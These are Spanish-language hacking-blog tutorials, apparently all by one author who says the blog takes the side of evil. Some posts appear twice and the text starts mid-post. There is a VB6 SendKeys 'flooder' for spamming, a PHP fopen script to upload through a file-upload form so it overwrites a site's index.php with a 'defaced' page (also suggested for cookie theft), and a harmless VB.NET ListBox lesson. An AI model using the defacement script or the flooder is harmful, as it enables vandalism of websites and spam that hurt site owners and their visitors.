SendKeys (Text1.Text) + ("{enter}")
End If

y ya tenemos listo casi todo...

con este code al apretar F1 pues haran que envie multiples veces lo que tengan escrito en el textbox1, ustedes lo pueden cambiar, puede ser control alt lo que quieran solo investiguen un poco mas del tema y podrán hacer maravillas...



Saludos
Dr.White

Haciendo un Flooder con Visual Basic

Hoy quería enseñar un poco el tema de los sendkeys para quien sabe jaja uso personal... y pues que mejor manera que empesar con un flooder...


Bueno primero que todo habran su visual basic 6 y pongan lo siguiente:

Private Declare Function GetKeyPress Lib "user32" Alias "GetAsyncKeyState" (ByVal key As Long) As Integer

no hagan caso al code jaja solo ponganlo...


ahora pues les voy a enseñar la parte importante... vamos a poner en el form un timer y vamos a poner en el form_load lo siguiente:

Timer1.Interval = "100"

tambien lo pueden hacer desde las propiedades del timer si gustan...

Ahora dentro del Timer1_Timer pondrán:

If GetKeyPress(vbKeyF1) Then
SendKeys (Text1.Text) + ("{enter}")
End If

y ya tenemos listo casi todo...

con este code al apretar F1 pues haran que envie multiples veces lo que tengan escrito en el textbox1, ustedes lo pueden cambiar, puede ser control alt lo que quieran solo investiguen un poco mas del tema y podrán hacer maravillas...



Saludos
Dr.White

Escribiendo Archivos con Fopen

Esto lo escribo ya que es muy util para el momento en el que ingresamos a páginas con upload de archivos... como dice el titulo vamos a escribir archivos con php de tal manera que podamos cambiar algo, puede ser el index en el caso de que alguien malo lo quiera hacer, como este es un blog en el que nos ponemos del lado del mal pues lo haremos para cambiar el index... a ver digamos que estamos en un upload de archivos la pagina tiene un filemanager o un upload de archivos que tiene filtrado para no poner un nuevo index... pensando que el admin es bueno en seguridad, vamos a abrir un blog de notas e ingresaremos las siguientes lineas de code...


<?php

$fp = fopen("../index.php", "w");

$tuindex = "\n<center> <h1>defaced</h1></center>";

$write = fputs($fp, $tuindex);

fclose($fp);

?>



listo ahora solo faltaría ir a la ruta del archivo y actualizar el index.php de todos modos pues este tema no solo se puede usar para cambiar index sino para robo de cookies o quizas para saber quienes entran a tu web y mantener un control... o estadisticas...

ojo ustedes tienen que cambiar el ../ por la cantidad de directorios que necesiten... espero les sirva este tuto...


Saludos
Dr.White

Escribiendo Archivos con Fopen

Esto lo escribo ya que es muy util para el momento en el que ingresamos a páginas con upload de archivos... como dice el titulo vamos a escribir archivos con php de tal manera que podamos cambiar algo, puede ser el index en el caso de que alguien malo lo quiera hacer, como este es un blog en el que nos ponemos del lado del mal pues lo haremos para cambiar el index... a ver digamos que estamos en un upload de archivos la pagina tiene un filemanager o un upload de archivos que tiene filtrado para no poner un nuevo index... pensando que el admin es bueno en seguridad, vamos a abrir un blog de notas e ingresaremos las siguientes lineas de code...


<?php

$fp = fopen("../index.php", "w");

$tuindex = "\n<center> <h1>defaced</h1></center>";

$write = fputs($fp, $tuindex);

fclose($fp);

?>



listo ahora solo faltaría ir a la ruta del archivo y actualizar el index.php de todos modos pues este tema no solo se puede usar para cambiar index sino para robo de cookies o quizas para saber quienes entran a tu web y mantener un control... o estadisticas...

ojo ustedes tienen que cambiar el ../ por la cantidad de directorios que necesiten... espero les sirva este tuto...


Saludos
Dr.White

Mini-Tuto Listbox en Visual Basic.NET by Me

Bueno muchachos un Control que es muy fácil de usar y que ahora les voy a explicar como funciona... obviamente solo algunas cosillas...

Primero vamos a conseguir un Listbox de la barra de herramientas... dejemoslo con el Nombre

"ListBox1" sin las comillas...


Ahora creamos un boton y un textbox tambien...


Lo primero como agregar items al Listbox1 pues fácil, vamos a usar el siguiente code para agregar 6 items...

ListBox1.Items.Add("hola0")
ListBox1.Items.Add("hola1")
ListBox1.Items.Add("hola2")
ListBox1.Items.Add("hola3")
ListBox1.Items.Add("hola4")
ListBox1.Items.Add("hola5")

Bueno asi se agregan los items poniendo nombre de tu listbox + items + entre parentesis tu item...


Ahora para ustedes muchachos... poniendo en un textbox el indice de un item es decir si el item es el primero se crea como un Arreglo y muestra el 0 con el siguiente code que pondremos en nuestro boton...

TextBox1.Text = ListBox1.SelectedIndex

ahora miren que le auto asignará un indice a su Item como si fuese un arreglo...


verán que cuando seleccionan un item aparece un indice ojo no tieen nada que ver con el numero que hay despues del Hola...


Otra cosa básica... como saber cuantos items hay en un Listbox...


TextBox1.Text = ListBox1.Items.Count


Fácil no?


ahora mm dejenme ver... a sisi quizas como podemos borrar un item por su indice...

ListBox1.Items.RemoveAt(CInt(TextBox1.Text))

poniendo ese code el numero que ustedes pongan lo borrará siempre y cuando exista pero eso ustedes lo pueden arreglar con una pequeña condición IF...


Bueno eso es lo mas básico de los Listbox, practiquen para que los puedan usar de manera mas facil pronto les enseñaré a usar tambien los combobox... los sockets y mas...

Saludos
Dr.White